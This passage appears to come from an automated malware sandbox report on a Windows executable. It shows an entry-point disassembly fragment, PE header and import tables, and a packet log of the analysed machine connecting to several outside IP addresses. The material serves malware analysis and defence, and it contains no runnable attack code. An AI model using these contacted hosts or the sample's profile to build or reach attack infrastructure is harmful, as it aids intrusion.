                                                                                                                      push 00000160h
                                                                                                                      push eax
                                                                                                                      push ebx
                                                                                                                      push 0041F458h
                                                                                                                      call dword ptr [00407158h]
                                                                                                                      push 004091B8h
                                                                                                                      push 004236A0h
                                                                                                                      call 00007F58B4E4EBE1h
                                                                                                                      call dword ptr [004070B0h]
                                                                                                                      mov edi, 00429000h
                                                                                                                      push eax
                                                                                                                      push edi
                                                                                                                      call 00007F58B4E4EBCFh
                                                                                                                      push ebx
                                                                                                                      call dword ptr [0040710Ch]
                                                                                                                      cmp byte ptr [00429000h], 00000022h
                                                                                                                      mov dword ptr [00423EA0h], eax
                                                                                                                      mov eax, edi
                                                                                                                      jne 00007F58B4E4C32Ch
                                                                                                                      mov byte ptr [esp+14h], 00000022h
                                                                                                                      mov eax, 00429001h
                                                                                                                      push dword ptr [esp+14h]
                                                                                                                      push eax
                                                                                                                      call 00007F58B4E4E6C2h
                                                                                                                      push eax
                                                                                                                      call dword ptr [0040721Ch]
                                                                                                                      mov dword ptr [esp+1Ch], eax
                                                                                                                      jmp 00007F58B4E4C385h
                                                                                                                      cmp cl, 00000020h
                                                                                                                      jne 00007F58B4E4C328h
                                                                                                                      inc eax
                                                                                                                      cmp byte ptr [eax], 00000020h
                                                                                                                      je 00007F58B4E4C31Ch
                                                                                                                      cmp byte ptr [eax], 00000022h
                                                                                                                      mov byte ptr [eax+eax+00h], 00000000h

                                                                                                                      Rich Headers

                                                                                                                      Programming Language:
                                                                                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                      Data Directories

                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x440000xd628.rsrc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x1bbf680x25f8
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                      Sections

                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                      .text0x10000x5a5a0x5c00False0.660453464674data6.41769823686IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                      .rdata0x70000x11900x1200False0.375217013889SysEx File -4.24219639454IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .data0x90000x1af980x400False0.55859375data4.70902740305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                      .ndata0x240000x200000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .rsrc0x440000xd6280xd800False0.300600405093data5.06095919413IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                      Resources

                                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                                      RT_ICON0x442e00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 1056964862EnglishUnited States
                                                                                                                      RT_ICON0x485080x25a8dataEnglishUnited States
                                                                                                                      RT_ICON0x4aab00x2488PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                                                                      RT_ICON0x4cf380x1a68dataEnglishUnited States
                                                                                                                      RT_ICON0x4e9a00x10a8dataEnglishUnited States
                                                                                                                      RT_ICON0x4fa480x988dataEnglishUnited States
                                                                                                                      RT_ICON0x503d00x6b8dataEnglishUnited States
                                                                                                                      RT_ICON0x50a880x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                      RT_DIALOG0x50ef00x202dataEnglishUnited States
                                                                                                                      RT_DIALOG0x510f80xf8dataEnglishUnited States
                                                                                                                      RT_DIALOG0x511f00xeedataEnglishUnited States
                                                                                                                      RT_GROUP_ICON0x512e00x76dataEnglishUnited States
                                                                                                                      RT_MANIFEST0x513580x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                                      Imports

                                                                                                                      DLLImport
                                                                                                                      KERNEL32.DLLCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                                                                                                                      ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                                                                      COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                      GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                                                                      ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                      SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                                                                      USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                                                                      VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                                                                      Possible Origin

                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                      EnglishUnited States

                                                                                                                      Network Behavior

                                                                                                                      Network Port Distribution

                                                                                                                      TCP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Sep 15, 2021 14:08:00.896482944 CEST4975280192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:00.917491913 CEST8049752185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:00.917788029 CEST4975280192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:00.918462038 CEST4975280192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:00.940159082 CEST8049752185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:00.940284014 CEST4975280192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:00.958070040 CEST4975280192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:00.980880976 CEST8049752185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:00.981093884 CEST4975280192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.008373976 CEST4975280192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.029356003 CEST8049752185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.029424906 CEST8049752185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.029478073 CEST4975280192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.029532909 CEST4975280192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.030750990 CEST4975280192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.035720110 CEST4975380192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.051665068 CEST8049752185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.056746006 CEST8049753185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.058818102 CEST4975380192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.058862925 CEST4975380192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.080029964 CEST8049753185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.082326889 CEST4975380192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.084237099 CEST4975380192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.105293989 CEST8049753185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.105370045 CEST4975380192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.106717110 CEST4975380192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.128108978 CEST8049753185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.130171061 CEST8049753185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.130367994 CEST4975380192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.131237030 CEST4975380192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.133955002 CEST4975480192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.152343035 CEST8049753185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.155005932 CEST8049754185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.155142069 CEST4975480192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.155966043 CEST4975480192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.179565907 CEST8049754185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.181721926 CEST4975480192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.183722973 CEST4975480192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.204659939 CEST8049754185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.207657099 CEST4975480192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.209389925 CEST4975480192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.230426073 CEST8049754185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.230473042 CEST8049754185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.230581045 CEST4975480192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.230953932 CEST4975480192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.237579107 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.251744032 CEST8049754185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.258640051 CEST8049755185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.258778095 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.259424925 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.282213926 CEST8049755185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.285140991 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.287225962 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.309426069 CEST8049755185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.314063072 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.314114094 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.335100889 CEST8049755185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.336735964 CEST8049755185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.342247963 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.342295885 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.350913048 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.394808054 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.395001888 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.395808935 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.435075998 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.435647964 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.439027071 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.478888988 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.489496946 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.495162010 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.495203018 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.542887926 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.542922020 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.544677973 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.544800043 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.584625006 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.585436106 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.587244987 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.623857975 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.627022028 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.627052069 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.627109051 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.627151966 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.808084965 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.808274031 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.847999096 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:02.235275030 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.278043985 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:02.278857946 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.336889029 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.336922884 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.336926937 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.376280069 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:02.376321077 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:02.377862930 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:02.377959967 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.378012896 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.422226906 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:02.731400013 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.731461048 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.731515884 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.731573105 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.770566940 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:02.770778894 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:02.770806074 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:02.770868063 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.770908117 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.770927906 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:02.770970106 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.771090031 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:02.771151066 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:03.447949886 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:03.448004007 CEST44349758172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:03.448137045 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:03.491561890 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:03.491594076 CEST44349758172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:03.544971943 CEST44349758172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:03.554230928 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:03.565861940 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:03.565896988 CEST44349758172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:03.566315889 CEST44349758172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:03.569859982 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:03.575009108 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:03.575213909 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:03.575308084 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:03.575320959 CEST44349758172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:03.575489044 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:03.575539112 CEST44349758172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:03.575915098 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:03.575965881 CEST44349758172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:03.576409101 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:03.576464891 CEST44349758172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:03.579519987 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:03.579540014 CEST44349758172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:03.579731941 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:03.579747915 CEST44349758172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:03.579889059 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:03.623191118 CEST44349758172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:04.602396011 CEST44349758172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:04.602509975 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:04.602520943 CEST44349758172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:04.602581978 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:04.602869034 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:04.603609085 CEST44349758172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:04.603674889 CEST49758443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:08:28.278345108 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:28.278428078 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:28.282900095 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:28.364269972 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:53.278769970 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:53.278851032 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:53.279131889 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:53.358046055 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:06.684334993 CEST49834443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:09:06.684380054 CEST44349834172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:06.684619904 CEST49834443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:09:06.685610056 CEST49834443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:09:06.685631990 CEST44349834172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:06.729605913 CEST44349834172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:06.729973078 CEST49834443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:09:06.730829000 CEST49834443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:09:06.730837107 CEST44349834172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:06.731583118 CEST49834443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:09:06.731600046 CEST44349834172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:06.731756926 CEST49834443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:09:06.731765985 CEST44349834172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:06.731897116 CEST49834443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:09:06.731903076 CEST44349834172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:06.732135057 CEST49834443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:09:06.732151985 CEST44349834172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:06.732676029 CEST49834443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:09:06.732707024 CEST44349834172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:06.733009100 CEST49834443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:09:06.733036995 CEST44349834172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:06.733330011 CEST49834443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:09:06.733345032 CEST44349834172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:08.403100967 CEST44349834172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:08.403352022 CEST49834443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:09:08.403363943 CEST44349834172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:08.403745890 CEST49834443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:09:08.403975010 CEST49834443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:09:08.404340982 CEST44349834172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:08.405304909 CEST49834443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:09:18.279109001 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:18.279416084 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:09:18.280694962 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:09:18.359952927 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:43.279575109 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:43.279683113 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:09:43.282150984 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:09:43.362061977 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:49.346477985 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:09:49.658139944 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:09:50.267776012 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:09:51.470997095 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:09:53.877405882 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:09:58.690196037 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:10:08.279808998 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:10:08.282210112 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:10:08.282516956 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:10:08.300369978 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:10:08.361845016 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:10:08.700365067 CEST49839443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:10:08.700424910 CEST44349839172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:10:08.702820063 CEST49839443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:10:08.702874899 CEST49839443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:10:08.702888966 CEST44349839172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:10:08.744781017 CEST44349839172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:10:08.744978905 CEST49839443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:10:08.746081114 CEST49839443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:10:08.746107101 CEST44349839172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:10:08.746469021 CEST49839443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:10:08.746480942 CEST44349839172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:10:08.746623993 CEST49839443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:10:08.746634960 CEST44349839172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:10:08.746679068 CEST49839443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:10:08.746684074 CEST44349839172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:10:08.746825933 CEST49839443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:10:08.746865988 CEST44349839172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:10:08.747260094 CEST49839443192.168.2.6172.67.205.33
